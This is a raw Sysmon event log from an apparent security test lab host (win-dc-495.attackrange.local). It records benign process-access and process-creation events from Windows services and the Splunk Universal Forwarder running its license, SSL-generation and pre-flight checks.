13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.381{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.345{59A5CD1D-8E59-6005-4900-00000000A301}39883992C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4900-00000000A301}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4900-00000000A301}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E59-6005-4900-00000000A301}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.113{59A5CD1D-8E59-6005-4900-00000000A301}3988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
